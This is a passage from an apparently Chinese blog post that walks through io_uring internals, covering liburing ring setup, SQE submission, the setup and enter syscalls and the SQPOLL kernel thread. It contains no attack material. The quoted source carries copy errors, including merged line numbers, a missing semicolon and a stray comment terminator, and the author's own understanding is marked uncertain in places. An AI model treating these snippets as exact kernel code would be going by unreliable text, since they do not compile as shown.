IORING_FEAT_SINGLE_MMAP ,就可以将sq 和 cq的ring一起mmap,否则,就分别单独mmap 最后再mmap sq的sqes 12345678910111213size = sizeof(struct io_uring_sqe);if (p->flags & IORING_SETUP_SQE128) size += 64;sq->sqes = __sys_mmap(0, size * p->sq_entries, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE, fd, IORING_OFF_SQES);if (IS_ERR(sq->sqes)){ ret = PTR_ERR(sq->sqes);err: io_uring_unmap_rings(sq, cq); return ret;} 最后的最后,设置相关指针 [[#io_uring_setup_ring_pointers]] 1io_uring_setup_ring_pointers(p, sq, cq); io_uring_setup_ring_pointers 此函数用来设置 struct io_uring ring 也就是liburing的核心管理结构体. 我们知道 sq->ring_ptr 在 kernel被映射到一个内核结构体, 其中结构体各个成员的偏移通过 io_uring_params 的两个 offset 成员结构体返回, 这里通过此拿到结构体对应成员的指针, 并赋值给 sq 和 cq 的各个成员, 这里的 sq 和 cq 又是 管理结构体 ring 的成员 123456789101112131415161718192021222324252627282930313233static void io_uring_setup_ring_pointers(struct io_uring_params *p, struct io_uring_sq *sq, struct io_uring_cq *cq){ sq->khead = sq->ring_ptr + p->sq_off.head; // 设置sq head的指针 sq->ktail = sq->ring_ptr + p->sq_off.tail; // 设置sq tail指针 sq->kring_mask = sq->ring_ptr + p->sq_off.ring_mask; sq->kring_entries = sq->ring_ptr + p->sq_off.ring_entries; // 设置sq entries个数 sq->kflags = sq->ring_ptr + p->sq_off.flags; // 设置对应标志 sq->kdropped = sq->ring_ptr + p->sq_off.dropped; if (!(p->flags & IORING_SETUP_NO_SQARRAY)) sq->array = sq->ring_ptr + p->sq_off.array; // 如果存在sqarray cq->khead = cq->ring_ptr + p->cq_off.head; // 设置cq head指针 cq->ktail = cq->ring_ptr + p->cq_off.tail; // 设置cq tail指针 cq->kring_mask = cq->ring_ptr + p->cq_off.ring_mask; cq->kring_entries = cq->ring_ptr + p->cq_off.ring_entries; cq->koverflow = cq->ring_ptr + p->cq_off.overflow; cq->cqes = cq->ring_ptr + p->cq_off.cqes; if (p->cq_off.flags) cq->kflags = cq->ring_ptr + p->cq_off.flags; sq->ring_mask = *sq->kring_mask; sq->ring_entries = *sq->kring_entries; cq->ring_mask = *cq->kring_mask; cq->ring_entries = *cq->kring_entries;} io_uring_get_sqe 此函数用来获取一个可用 sqe 用来提交任务,最终是调用了 _io_uring_get_sqe, 整个函数用非常优雅的方式实现了循环队列// #Elegant 123456789101112131415161718192021222324252627282930IOURINGINLINE struct io_uring_sqe *_io_uring_get_sqe(struct io_uring *ring){ struct io_uring_sq *sq = &ring->sq; unsigned int head, next = sq->sqe_tail + 1; int shift = 0; if (ring->flags & IORING_SETUP_SQE128) shift = 1; if (!(ring->flags & IORING_SETUP_SQPOLL)) head = IO_URING_READ_ONCE(*sq->khead); else head = io_uring_smp_load_acquire(sq->khead); // 通过原子读获取head // sq->khead = sq->ring_ptr + p->sq_off.head; // 这里实际上读的是共享内存的一个指针内存的 uint 值 if (next - head <= sq->ring_entries) { struct io_uring_sqe *sqe; sqe = &sq->sqes[(sq->sqe_tail & sq->ring_mask) << shift]; // sq->ring_mask 来自kernel 设置的params // rings->sq_ring_mask = p->sq_entries - 1; // 由于sq_entries 为2的幂次倍 // 这里实际上就是一个循环队列的访问, sq->sqe_tail = next; return sqe; } return NULL;} io_uring_prep_xxx 这是一个系列函数, 用来实现 io_uring 提供的各种 io操作, 其根本实现是 设置 一个 sqe 结构体(这个结构体是内核的API), 这里以 io_uring_prep_openat 为例 1234567IOURINGINLINE void io_uring_prep_openat(struct io_uring_sqe *sqe, int dfd, const char *path, int flags, mode_t mode){ io_uring_prep_rw(IORING_OP_OPENAT, sqe, dfd, path, mode, 0); sqe->open_flags = (__u32) flags;} 12345678910111213141516171819202122IOURINGINLINE void io_uring_prep_rw(int op, struct io_uring_sqe *sqe, int fd, const void *addr, unsigned len, __u64 offset){ sqe->opcode = (__u8) op; // 设置op为 open sqe->flags = 0 sqe->ioprio = 0; sqe->fd = fd; // 提供表示dir 的 -100 fd sqe->off = offset; // 0 sqe->addr = (unsigned long) addr; // 提供文件地址 sqe->len = len; sqe->rw_flags = 0; sqe->buf_index = 0; sqe->personality = 0; sqe->file_index = 0; sqe->addr3 = 0; 
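// note: SQE slots live in the shared ring and are reused across submissions, so the prep helpers re-initialize every field rather than assuming zeroed memory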
sqe->__pad2[0] = 0;} 归根结底就是设置了一个sqe 这里笔者有一个问题: #TODO 在IORING_SETUP_SQROLL时, io_uring用户和内核采用共享内存通信,内核态是如何知道一个sqe的全部参数已经设置完毕了,有没有可能用户态正在设置sqe的部分成员时,内核已经在处理这个sqe了? 在之后 [[#__io_uring_flush_sq]] 笔者似乎找到了这个问题的答案: 通过 memory_store_release 保证sqe的更新不会被重排到 ktail 的修改前 通过 修改 ktail 表示真正提交了一个任务 io_uring_submit io_uring_submit 用于提交一个任务 1234int io_uring_submit(struct io_uring *ring){ return __io_uring_submit_and_wait(ring, 0);} 12345static int __io_uring_submit_and_wait(struct io_uring *ring, unsigned wait_nr){ return __io_uring_submit(ring, __io_uring_flush_sq(ring), wait_nr, false);} 最终到达 __io_uring_submit. 不过这个函数, 在SQPOLL模式下用处不大, 真正的提交操作应该说是在 __io_uring_flush_sq 中实现的. 这里主要是判断当前情况需不需要调用 io_uring_enter syscall. 如果当前 是IOPOLL模式, 就需要 io_uring_enter 来收割任务. 如果是 SQPOLL 模式, 且 内核处理线程已 idle ,那么就通过 io_uring_enter syscall 来唤醒 123456789101112131415161718192021static int __io_uring_submit(struct io_uring *ring, unsigned submitted, unsigned wait_nr, bool getevents){ bool cq_needs_enter = getevents || wait_nr || cq_ring_needs_enter(ring); unsigned flags; int ret; flags = 0; if (sq_ring_needs_enter(ring, submitted, &flags) || cq_needs_enter) { if (cq_needs_enter) flags |= IORING_ENTER_GETEVENTS; if (ring->int_flags & INT_FLAG_REG_RING) flags |= IORING_ENTER_REGISTERED_RING; ret = __sys_io_uring_enter(ring->enter_ring_fd, submitted, wait_nr, flags, NULL); } else ret = submitted; return ret;} __io_uring_flush_sq 主要用来更新内核sq 的tail指针, 最终返回需要提交的任务数 123456789101112131415161718192021static unsigned __io_uring_flush_sq(struct io_uring *ring){ struct io_uring_sq *sq = &ring->sq; unsigned tail = sq->sqe_tail; if (sq->sqe_head != tail) { sq->sqe_head = tail; /* * Ensure kernel sees the SQE updates before the tail update. */ if (!(ring->flags & IORING_SETUP_SQPOLL)) IO_URING_WRITE_ONCE(*sq->ktail, tail); // 原子读 else io_uring_smp_store_release(sq->ktail, tail); // memory_release 的内存序来写 } */ return tail - *sq->khead;} 在 SQPOLL 模式下,内核提交者可能同时在更新头指针。 对于非 SQPOLL 模式,应用自己更新头指针,不存在并发问题。 即使 SQPOLL 模式下,就算头指针读取是原子的,获取到的值也可能立即过期,存在并发修改的问题。 最坏情况下,读取的值会高估实际可提交的请求数。 在这里用到了一个原子写 IO_URING_WRITE_ONCE . 
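The IO_URING_WRITE_ONCE / io_uring_smp_store_release pair discussed next is easiest to see as a generic publish pattern: the producer must make the SQE contents globally visible before the new tail value, otherwise the SQPOLL thread could read a half-written entry. A self-contained sketch with C11 atomics (illustrative only, not liburing's actual macros):

```c
#include <stdatomic.h>

struct fake_sqe { unsigned long op, arg; };

static struct fake_sqe sqes[256];
static _Atomic unsigned tail;

/* producer side (the application) */
void publish(unsigned slot, unsigned long op, unsigned long arg)
{
    sqes[slot & 255].op  = op;
    sqes[slot & 255].arg = arg;
    /* release: the SQE writes above cannot be reordered after this store */
    atomic_store_explicit(&tail, slot + 1, memory_order_release);
}

/* consumer side (conceptually, the kernel SQPOLL thread) */
int consume(unsigned head, struct fake_sqe *out)
{
    /* acquire: pairs with the release store, so once the new tail is seen,
     * the SQE contents written before it are guaranteed to be visible */
    unsigned t = atomic_load_explicit(&tail, memory_order_acquire);
    if (head == t)
        return 0;
    *out = sqes[head & 255];
    return 1;
}
```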
而 io_uring_smb_store_release 笔者涉及到内存序的问题,内存序是为了防止指令重排产生的,笔者还没有特别理解。 笔者尝试解释一下, 这里使用使用memory_order_release内存序标注这个存储操作 release内存序的特点是: 当前线程本地的修改对其他线程可见 防止存储操作被重新排序 这里应该是让此处对于sqe的修改,要在对于tail指针的修改前完成,防止指令重排的影响 如果是对于IOPOLL,内核的真正确认提交是在 io_uring_enter 实现的,其实是和当前处于同一个线程,因此不需要通过 memory_order_release 来保证 “当前线程本地的修改对其他线程可见”, 对同一线程的数据冒险应该是由旁路机制处理的 #TODO 123#define io_uring_smp_store_release(p, v) \\ atomic_store_explicit((_Atomic __typeof__(*(p)) *)(p), (v), \\ memory_order_release) syscall syscall是内核提供给用户态的接口,io_uring涉及三个syscall io_uring_setup(2) io_uring_enter(2) io_uring_register(2) 笔者这里主要讲述前两个syscall io_uring_setup 参数 entries: sq队列大小 params:提供的各种参数,许多返回值也会写入此结构体积 123456789101112131415161718192021222324252627static long io_uring_setup(u32 entries, struct io_uring_params __user *params){ struct io_uring_params p; int i; if (copy_from_user(&p, params, sizeof(p))) return -EFAULT; // 将params复制到内核空间 for (i = 0; i < ARRAY_SIZE(p.resv); i++) { if (p.resv[i]) return -EINVAL; } if (p.flags & ~(IORING_SETUP_IOPOLL | IORING_SETUP_SQPOLL | IORING_SETUP_SQ_AFF | IORING_SETUP_CQSIZE | IORING_SETUP_CLAMP | IORING_SETUP_ATTACH_WQ | IORING_SETUP_R_DISABLED | IORING_SETUP_SUBMIT_ALL | IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG | IORING_SETUP_SQE128 | IORING_SETUP_CQE32 | IORING_SETUP_SINGLE_ISSUER | IORING_SETUP_DEFER_TASKRUN | IORING_SETUP_NO_MMAP | IORING_SETUP_REGISTERED_FD_ONLY | IORING_SETUP_NO_SQARRAY)) return -EINVAL; // 如果有非法flag,直接返回 return io_uring_create(entries, &p, params);} 接下来是首先检查entries 和flags。 12345678910111213141516171819static __cold int io_uring_create(unsigned entries, struct io_uring_params *p, struct io_uring_params __user *params){ struct io_ring_ctx *ctx; struct io_uring_task *tctx; struct file *file; int ret; if (!entries) return -EINVAL; if (entries > IORING_MAX_ENTRIES) { if (!(p->flags & IORING_SETUP_CLAMP)) return -EINVAL; entries = IORING_MAX_ENTRIES; } if ((p->flags & IORING_SETUP_REGISTERED_FD_ONLY) && !(p->flags & IORING_SETUP_NO_MMAP)) return -EINVAL; 设置sq_entries 以2的幂次向上取整, 这是为了方便环形队列的处理. 1234567891011121314151617181920p->sq_entries = roundup_pow_of_two(entries);if (p->flags & IORING_SETUP_CQSIZE) { /* * If IORING_SETUP_CQSIZE is set, we do the same roundup * to a power-of-two, if it isn't already. We do NOT impose * any cq vs sq ring sizing. */ if (!p->cq_entries) return -EINVAL; if (p->cq_entries > IORING_MAX_CQ_ENTRIES) { if (!(p->flags & IORING_SETUP_CLAMP)) return -EINVAL; p->cq_entries = IORING_MAX_CQ_ENTRIES; } p->cq_entries = roundup_pow_of_two(p->cq_entries); if (p->cq_entries < p->sq_entries) return -EINVAL;} else { p->cq_entries = 2 * p->sq_entries;} 接下来是一系列设置ctx的代码,笔者暂且不在这里分析,之后遇见了再分析每一项 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273ctx = io_ring_ctx_alloc(p);if (!ctx) return -ENOMEM;if ((ctx->flags & IORING_SETUP_DEFER_TASKRUN) && !(ctx->flags & IORING_SETUP_IOPOLL) && !(ctx->flags & IORING_SETUP_SQPOLL)) ctx->task_complete = true;if (ctx->task_complete || (ctx->flags & IORING_SETUP_IOPOLL)) ctx->lockless_cq = true;/* * lazy poll_wq activation relies on ->task_complete for synchronisation * purposes, see io_activate_pollwq() */if (!ctx->task_complete) ctx->poll_activated = true;/* * When SETUP_IOPOLL and SETUP_SQPOLL are both enabled, user * space applications don't need to do io completion events * polling again, they can rely on io_sq_thread to do polling * work, which can reduce cpu usage and uring_lock contention. 
*/if (ctx->flags & IORING_SETUP_IOPOLL && !(ctx->flags & IORING_SETUP_SQPOLL)) ctx->syscall_iopoll = 1;ctx->compat = in_compat_syscall();if (!ns_capable_noaudit(&init_user_ns, CAP_IPC_LOCK)) ctx->user = get_uid(current_user());/* * For SQPOLL, we just need a wakeup, always. For !SQPOLL, if * COOP_TASKRUN is set, then IPIs are never needed by the app. */ret = -EINVAL;if (ctx->flags & IORING_SETUP_SQPOLL) { /* IPI related flags don't make sense with SQPOLL */ if (ctx->flags & (IORING_SETUP_COOP_TASKRUN | IORING_SETUP_TASKRUN_FLAG | IORING_SETUP_DEFER_TASKRUN)) goto err; ctx->notify_method = TWA_SIGNAL_NO_IPI;} else if (ctx->flags & IORING_SETUP_COOP_TASKRUN) { ctx->notify_method = TWA_SIGNAL_NO_IPI;} else { if (ctx->flags & IORING_SETUP_TASKRUN_FLAG && !(ctx->flags & IORING_SETUP_DEFER_TASKRUN)) goto err; ctx->notify_method = TWA_SIGNAL;}/* * For DEFER_TASKRUN we require the completion task to be the same as the * submission task. This implies that there is only one submitter, so enforce * that. */if (ctx->flags & IORING_SETUP_DEFER_TASKRUN && !(ctx->flags & IORING_SETUP_SINGLE_ISSUER)) { goto err;}/* * This is just grabbed for accounting purposes. When a process exits, * the mm is exited and dropped before the files, hence we need to hang * on to this mm purely for the purposes of being able to unaccount * memory (locked/pinned vm). It's not used for anything else. */mmgrab(current->mm);ctx->mm_account = current->mm; [[#io_allocate_scq_urings ]] 分配了scq和rings的内存 [[#io_sq_offload_create]] 创建了任务处理线程 1234567891011ret = io_allocate_scq_urings(ctx, p);if (ret) goto err;ret = io_sq_offload_create(ctx, p);if (ret) goto err;ret = io_rsrc_init(ctx);if (ret) goto err; 设置sq_off,即通过 params 返回给用户的 ring 中各个成员的偏移 1234567891011121314151617181920p->sq_off.head = offsetof(struct io_rings, sq.head);p->sq_off.tail = offsetof(struct io_rings, sq.tail);p->sq_off.ring_mask = offsetof(struct io_rings, sq_ring_mask);p->sq_off.ring_entries = offsetof(struct io_rings, sq_ring_entries);p->sq_off.flags = offsetof(struct io_rings, sq_flags);p->sq_off.dropped = offsetof(struct io_rings, sq_dropped);if (!(ctx->flags & IORING_SETUP_NO_SQARRAY)) p->sq_off.array = (char *)ctx->sq_array - (char *)ctx->rings;p->sq_off.resv1 = 0;if (!(ctx->flags & IORING_SETUP_NO_MMAP)) p->sq_off.user_addr = 0;p->cq_off.head = offsetof(struct io_rings, cq.head);p->cq_off.tail = offsetof(struct io_rings, cq.tail);p->cq_off.ring_mask = offsetof(struct io_rings, cq_ring_mask);p->cq_off.ring_entries = offsetof(struct io_rings, cq_ring_entries);p->cq_off.overflow = offsetof(struct io_rings, cq_overflow);p->cq_off.cqes = offsetof(struct io_rings, cqes);p->cq_off.flags = offsetof(struct io_rings, cq_flags);p->cq_off.resv1 = 0; 设置feature 1234567p->features = IORING_FEAT_SINGLE_MMAP | IORING_FEAT_NODROP | IORING_FEAT_SUBMIT_STABLE | IORING_FEAT_RW_CUR_POS | IORING_FEAT_CUR_PERSONALITY | IORING_FEAT_FAST_POLL | IORING_FEAT_POLL_32BITS | IORING_FEAT_SQPOLL_NONFIXED | IORING_FEAT_EXT_ARG | IORING_FEAT_NATIVE_WORKERS | IORING_FEAT_RSRC_TAGS | IORING_FEAT_CQE_SKIP | IORING_FEAT_LINKED_FILE | IORING_FEAT_REG_REG_RING; 再将params复制回用户空间 1234if (copy_to_user(params, p, sizeof(*p))) { ret = -EFAULT; goto err;} 最后是注册fd 12345678910111213141516171819202122232425if (ctx->flags & IORING_SETUP_SINGLE_ISSUER && !(ctx->flags & IORING_SETUP_R_DISABLED)) WRITE_ONCE(ctx->submitter_task, get_task_struct(current));file = io_uring_get_file(ctx);if (IS_ERR(file)) { ret = PTR_ERR(file); goto err;}ret = __io_uring_add_tctx_node(ctx);if (ret) goto err_fput;tctx = 
current->io_uring;/* * Install ring fd as the very last thing, so we don't risk someone * having closed it before we finish setup */if (p->flags & IORING_SETUP_REGISTERED_FD_ONLY) ret = io_ring_add_registered_file(tctx, file, 0, IO_RINGFD_REG_MAX);else ret = io_uring_install_fd(file);if (ret < 0) goto err_fput; 错误处理如下: 123456err: io_ring_ctx_wait_and_kill(ctx); return ret;err_fput: fput(file); return ret; io_allocate_scq_urings 首先是rings的分配,核心关键点在于NO_MMAP 的处理 1234567891011121314151617181920212223242526static __cold int io_allocate_scq_urings(struct io_ring_ctx *ctx, struct io_uring_params *p){ struct io_rings *rings; size_t size, sq_array_offset; void *ptr; /* make sure these are sane, as we already accounted them */ ctx->sq_entries = p->sq_entries; ctx->cq_entries = p->cq_entries; size = rings_size(ctx, p->sq_entries, p->cq_entries, &sq_array_offset); if (size == SIZE_MAX) return -EOVERFLOW; if (!(ctx->flags & IORING_SETUP_NO_MMAP)) rings = io_mem_alloc(size); // 如果没有设置NO_MMAP,就分配 else rings = io_rings_map(ctx, p->cq_off.user_addr, size); // 反之,建立映射 if (IS_ERR(rings)) return PTR_ERR(rings); ctx->rings = rings; 接下来是类似的,sqe的分配: 123456789101112131415161718192021222324252627if (!(ctx->flags & IORING_SETUP_NO_SQARRAY)) ctx->sq_array = (u32 *)((char *)rings + sq_array_offset);rings->sq_ring_mask = p->sq_entries - 1;rings->cq_ring_mask = p->cq_entries - 1;rings->sq_ring_entries = p->sq_entries;rings->cq_ring_entries = p->cq_entries;if (p->flags & IORING_SETUP_SQE128) size = array_size(2 * sizeof(struct io_uring_sqe), p->sq_entries);else size = array_size(sizeof(struct io_uring_sqe), p->sq_entries);if (size == SIZE_MAX) { io_rings_free(ctx); return -EOVERFLOW;}if (!(ctx->flags & IORING_SETUP_NO_MMAP)) ptr = io_mem_alloc(size);else ptr = io_sqes_map(ctx, p->sq_off.user_addr, size);if (IS_ERR(ptr)) { io_rings_free(ctx); return PTR_ERR(ptr);}ctx->sq_sqes = ptr; io_sq_offload_create 如果设置了 SQPOLL, 用来创建内核收割任务的线程 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091__cold int io_sq_offload_create(struct io_ring_ctx *ctx, struct io_uring_params *p){ int ret; /* Retain compatibility with failing for an invalid attach attempt */ if ((ctx->flags & (IORING_SETUP_ATTACH_WQ | IORING_SETUP_SQPOLL)) == IORING_SETUP_ATTACH_WQ) { struct fd f; f = fdget(p->wq_fd); if (!f.file) return -ENXIO; if (!io_is_uring_fops(f.file)) { fdput(f); return -EINVAL; } fdput(f); } if (ctx->flags & IORING_SETUP_SQPOLL) { struct task_struct *tsk; struct io_sq_data *sqd; bool attached; ret = security_uring_sqpoll(); if (ret) return ret; sqd = io_get_sq_data(p, &attached); // 获取一个sqd if (IS_ERR(sqd)) { ret = PTR_ERR(sqd); goto err; } ctx->sq_creds = get_current_cred(); ctx->sq_data = sqd; ctx->sq_thread_idle = msecs_to_jiffies(p->sq_thread_idle); if (!ctx->sq_thread_idle) ctx->sq_thread_idle = HZ; // 设置相关信息 io_sq_thread_park(sqd); list_add(&ctx->sqd_list, &sqd->ctx_list); io_sqd_update_thread_idle(sqd); /* don't attach to a dying SQPOLL thread, would be racy */ ret = (attached && !sqd->thread) ? 
-ENXIO : 0; io_sq_thread_unpark(sqd); if (ret < 0) goto err; if (attached) return 0; if (p->flags & IORING_SETUP_SQ_AFF) { int cpu = p->sq_thread_cpu; ret = -EINVAL; if (cpu >= nr_cpu_ids || !cpu_online(cpu)) goto err_sqpoll; sqd->sq_cpu = cpu; } else { sqd->sq_cpu = -1; } sqd->task_pid = current->pid; sqd->task_tgid = current->tgid; tsk = create_io_thread(io_sq_thread, sqd, NUMA_NO_NODE); // 创建处理线程 if (IS_ERR(tsk)) { ret = PTR_ERR(tsk); goto err_sqpoll; } sqd->thread = tsk; ret = io_uring_alloc_task_context(tsk, ctx); wake_up_new_task(tsk); if (ret) goto err; } else if (p->flags & IORING_SETUP_SQ_AFF) { /* Can't have SQ_AFF without SQPOLL */ ret = -EINVAL; goto err; } return 0;err_sqpoll: complete(&ctx->sq_data->exited);err: io_sq_thread_finish(ctx); return ret;} io_uring_enter 首先是对于flag的检查和确认,这里不一一赘述了,感兴趣的去看相应的man page更能了解 1234567891011121314151617181920212223242526272829303132333435363738394041SYSCALL_DEFINE6(io_uring_enter, unsigned int, fd, u32, to_submit, u32, min_complete, u32, flags, const void __user *, argp, size_t, argsz){ struct io_ring_ctx *ctx; struct fd f; long ret; if (unlikely(flags & ~(IORING_ENTER_GETEVENTS | IORING_ENTER_SQ_WAKEUP | IORING_ENTER_SQ_WAIT | IORING_ENTER_EXT_ARG | IORING_ENTER_REGISTERED_RING))) return -EINVAL; /* * Ring fd has been registered via IORING_REGISTER_RING_FDS, we * need only dereference our task private array to find it. */ if (flags & IORING_ENTER_REGISTERED_RING) { struct io_uring_task *tctx = current->io_uring; if (unlikely(!tctx || fd >= IO_RINGFD_REG_MAX)) return -EINVAL; fd = array_index_nospec(fd, IO_RINGFD_REG_MAX); f.file = tctx->registered_rings[fd]; f.flags = 0; if (unlikely(!f.file)) return -EBADF; } else { f = fdget(fd); if (unlikely(!f.file)) return -EBADF; ret = -EOPNOTSUPP; if (unlikely(!io_is_uring_fops(f.file))) goto out; } ctx = f.file->private_data; ret = -EBADFD; if (unlikely(ctx->flags & IORING_SETUP_R_DISABLED)) goto out; SQPOLL模式下,直接返回提交数,可选择性wakeup线程 12345678910111213141516171819202122/* * For SQ polling, the thread will do all submissions and completions. * Just return the requested submit count, and wake the thread if * we were asked to. */ret = 0;if (ctx->flags & IORING_SETUP_SQPOLL) { io_cqring_overflow_flush(ctx); if (unlikely(ctx->sq_data->thread == NULL)) { ret = -EOWNERDEAD; goto out; } if (flags & IORING_ENTER_SQ_WAKEUP) // 这个flag处于和用户态共享的内存 // 如果sq处理线程休眠了,并需要唤醒 // 可以通过设置 IORING_ENTER_SQ_WAKEUP, 再通过此syscall 来唤醒 wake_up(&ctx->sq_data->wait); if (flags & IORING_ENTER_SQ_WAIT) io_sqpoll_wait_sq(ctx); ret = to_submit; 非SQPOLL模式,执行提交请求到SQ环 1234567891011121314151617181920212223242526} else if (to_submit) { ret = io_uring_add_tctx_node(ctx); if (unlikely(ret)) goto out; mutex_lock(&ctx->uring_lock); ret = io_submit_sqes(ctx, to_submit); // 直接提交 sqes // 这个函数将在后面分析 // SQPOLL 模式下创建的io_sq_thread 也会调用此函数 if (ret != to_submit) { mutex_unlock(&ctx->uring_lock); goto out; } if (flags & IORING_ENTER_GETEVENTS) { if (ctx->syscall_iopoll) goto iopoll_locked; /* * Ignore errors, we'll soon call io_cqring_wait() and * it should handle ownership problems if any. 
*/ if (ctx->flags & IORING_SETUP_DEFER_TASKRUN) (void)io_run_local_work_locked(ctx); } mutex_unlock(&ctx->uring_lock);} 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647 if (flags & IORING_ENTER_GETEVENTS) { // 如果请求获取完成事件 int ret2; if (ctx->syscall_iopoll) { // 如果开启了syscall轮询模式,执行iopoll逻辑 /* * We disallow the app entering submit/complete with * polling, but we still need to lock the ring to * prevent racing with polled issue that got punted to * a workqueue. */ mutex_lock(&ctx->uring_lock);iopoll_locked: ret2 = io_validate_ext_arg(flags, argp, argsz); if (likely(!ret2)) { min_complete = min(min_complete, ctx->cq_entries); ret2 = io_iopoll_check(ctx, min_complete); } mutex_unlock(&ctx->uring_lock); } else { const sigset_t __user *sig; struct __kernel_timespec __user *ts; ret2 = io_get_ext_arg(flags, argp, &argsz, &ts, &sig); if (likely(!ret2)) { min_complete = min(min_complete, ctx->cq_entries); ret2 = io_cqring_wait(ctx, min_complete, sig, argsz, ts); } } if (!ret) { ret = ret2; /* * EBADR indicates that one or more CQE were dropped. * Once the user has been informed we can clear the bit * as they are obviously ok with those drops. */ if (unlikely(ret2 == -EBADR)) clear_bit(IO_CHECK_CQ_DROPPED_BIT, &ctx->check_cq); } } 如果请求获取完成事件 如果开启了syscall轮询模式,执行iopoll逻辑 否则执行等待完成事件逻辑 kernel 最后是io_uring 内核的任务处理, 在这里先给出一个流程图, 然后再具体分析各个函数 图来自 https://zhuanlan.zhihu.com/p/380726590 , 侵删// io_sq_thread | 内核任务提交机制 io_sq_thread是 SQPOLL 模式下内核任务轮询线程. 首先设置线程环境 1234567891011121314151617181920static int io_sq_thread(void *data){ struct io_sq_data *sqd = data; struct io_ring_ctx *ctx; unsigned long timeout = 0; char buf[TASK_COMM_LEN]; DEFINE_WAIT(wait); snprintf(buf, sizeof(buf), "iou-sqp-%d", sqd->task_pid); set_task_comm(current, buf); /* reset to our pid after we've set task_comm, for fdinfo */ sqd->task_pid = current->pid; if (sqd->sq_cpu != -1) { set_cpus_allowed_ptr(current, cpumask_of(sqd->sq_cpu)); } else { set_cpus_allowed_ptr(current, cpu_online_mask); sqd->sq_cpu = raw_smp_processor_id(); } 接下来获取锁并进入无限循环 12mutex_lock(&sqd->lock);while (1) { 设置好timeout 123456if (io_sqd_events_pending(sqd) || signal_pending(current)) { if (io_sqd_handle_event(sqd)) break; timeout = jiffies + sqd->sq_thread_idle; // sq_thread_idle 来自用户在 params 设置的时间} 注意到这个线程创建在内存分配好之后, 即,即使是第一次进入此线程, 如果 sqes对应内存有任务,也会处理任务, 意味着在 io_uring_setup 之前,在sqes写好的任务,也可以被处理 1234567891011121314151617181920212223242526272829cap_entries = !list_is_singular(&sqd->ctx_list);// 获取是否有多个io_ring的标记cap_entrieslist_for_each_entry(ctx, &sqd->ctx_list, sqd_list) {// 遍历注册的io_ring,调用__io_sq_thread做实际的轮询操作 int ret = __io_sq_thread(ctx, cap_entries); if (!sqt_spin && (ret > 0 || !wq_list_empty(&ctx->iopoll_list))) sqt_spin = true; // 如果有事件处理或iopoll任务,则设置sqt_spin标记}if (io_run_task_work())// 调用io_run_task_work处理排队的工作任务 sqt_spin = true;if (sqt_spin || !time_after(jiffies, timeout)) {// 如果有待处理事件或时间没超时 if (sqt_spin) timeout = jiffies + sqd->sq_thread_idle; // 如果有待处理事件,更新下一次超时时间 if (unlikely(need_resched())) { // 检查是否需要调度,如果需要,主动释放并重新获取锁 mutex_unlock(&sqd->lock); cond_resched(); mutex_lock(&sqd->lock); sqd->sq_cpu = raw_smp_processor_id(); } continue; // 没超时就直接continue, 因为之后就是判断是否需要阻塞} 接下来实现io_uring SQ线程的阻塞和唤醒逻辑 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748 prepare_to_wait(&sqd->wait, &wait, TASK_INTERRUPTIBLE); // 将当前线程设置为可中断状态TASK_INTERRUPTIBLE if (!io_sqd_events_pending(sqd) && !task_work_pending(current)) { bool needs_sched = true; // 检查是否有待处理事件和任务 list_for_each_entry(ctx, &sqd->ctx_list, 
sqd_list) { // 若没有则遍历所有注册的io_ring atomic_or(IORING_SQ_NEED_WAKEUP, &ctx->rings->sq_flags); // 设置IORING_SQ_NEED_WAKEUP标志 if ((ctx->flags & IORING_SETUP_IOPOLL) && !wq_list_empty(&ctx->iopoll_list)) { // 检查iopoll和SQ队列是否为空 needs_sched = false; break; } /* * Ensure the store of the wakeup flag is not * reordered with the load of the SQ tail */ smp_mb__after_atomic(); if (io_sqring_entries(ctx)) { needs_sched = false; break; } } if (needs_sched) { // 如果需要调度 mutex_unlock(&sqd->lock); // 释放锁调度 schedule(); mutex_lock(&sqd->lock); // 唤醒后重新获取锁和CPU信息 sqd->sq_cpu = raw_smp_processor_id(); } list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) atomic_andnot(IORING_SQ_NEED_WAKEUP, &ctx->rings->sq_flags); // 否则清除唤醒标记 } finish_wait(&sqd->wait, &wait); timeout = jiffies + sqd->sq_thread_idle; // 更新等待时间} 最后是退出无限循环时的清理机制 123456789io_uring_cancel_generic(true, sqd);sqd->thread = NULL;list_for_each_entry(ctx, &sqd->ctx_list, sqd_list) atomic_or(IORING_SQ_NEED_WAKEUP, &ctx->rings->sq_flags);io_run_task_work();mutex_unlock(&sqd->lock);complete(&sqd->exited);do_exit(0); __io_sq_thread 12345678910111213141516171819202122232425262728293031323334353637383940414243static int __io_sq_thread(struct io_ring_ctx *ctx, bool cap_entries){ unsigned int to_submit; int ret = 0; to_submit = io_sqring_entries(ctx); /* if we're handling multiple rings, cap submit size for fairness */ if (cap_entries && to_submit > IORING_SQPOLL_CAP_ENTRIES_VALUE) to_submit = IORING_SQPOLL_CAP_ENTRIES_VALUE; // 计算需要提交的任务数量 // 如果需要公平,则 cap 为固定最大值 if (!wq_list_empty(&ctx->iopoll_list) || to_submit) { // 如果有 iopoll 任务或可提交请求 const struct cred *creds = NULL; if (ctx->sq_creds != current_cred()) creds = override_creds(ctx->sq_creds); // 保存和恢复 creds 身份信息避免安全漏洞 mutex_lock(&ctx->uring_lock); // 上锁保护关键区 if (!wq_list_empty(&ctx->iopoll_list)) io_do_iopoll(ctx, true); // 处理 iopoll 轮询事件 /* * Don't submit if refs are dying, good for io_uring_register(), * but also it is relied upon by io_ring_exit_work() */ if (to_submit && likely(!percpu_ref_is_dying(&ctx->refs)) && !(ctx->flags & IORING_SETUP_R_DISABLED)) ret = io_submit_sqes(ctx, to_submit); // 提交请求到 SQ 环 mutex_unlock(&ctx->uring_lock); if (to_submit && wq_has_sleeper(&ctx->sqo_sq_wait)) wake_up(&ctx->sqo_sq_wait); // 唤醒 sqo_sq 等待线程 if (creds) revert_creds(creds); } return ret;} 其中 io_sqring_entries 逻辑如下 所以内核在SQPOLL 模式下判断是否有任务需要执行,就是看 tail 是否更新 123456789static inline unsigned int io_sqring_entries(struct io_ring_ctx *ctx){ struct io_rings *rings = ctx->rings; unsigned int entries; /* make sure SQ entry isn't read before tail */ entries = smp_load_acquire(&rings->sq.tail) - ctx->cached_sq_head; return 